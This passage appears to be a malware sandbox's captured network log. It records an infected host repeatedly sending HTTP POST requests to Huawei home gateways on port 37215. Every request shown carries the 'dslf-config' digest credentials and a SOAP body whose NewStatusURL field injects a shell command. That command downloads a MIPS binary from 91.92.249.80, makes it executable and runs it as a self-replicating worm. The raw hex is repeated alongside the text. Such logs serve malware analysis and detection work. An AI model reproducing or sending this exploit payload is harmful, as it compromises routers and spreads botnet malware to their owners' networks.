                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1465192.168.2.2349638197.90.206.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474381924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1466192.168.2.2339752157.90.92.24737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474391937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1467192.168.2.2337686197.160.137.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474457979 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1468192.168.2.235133241.241.210.037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474467039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1469192.168.2.2350122197.104.21.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474468946 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1470192.168.2.2356080197.90.136.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474543095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1471192.168.2.2360796197.53.196.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474550962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1472192.168.2.2345526157.204.136.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474633932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1473192.168.2.2335486157.42.40.19737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474641085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1474192.168.2.2352676157.234.31.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474657059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1475192.168.2.2360768157.159.53.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.474658012 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
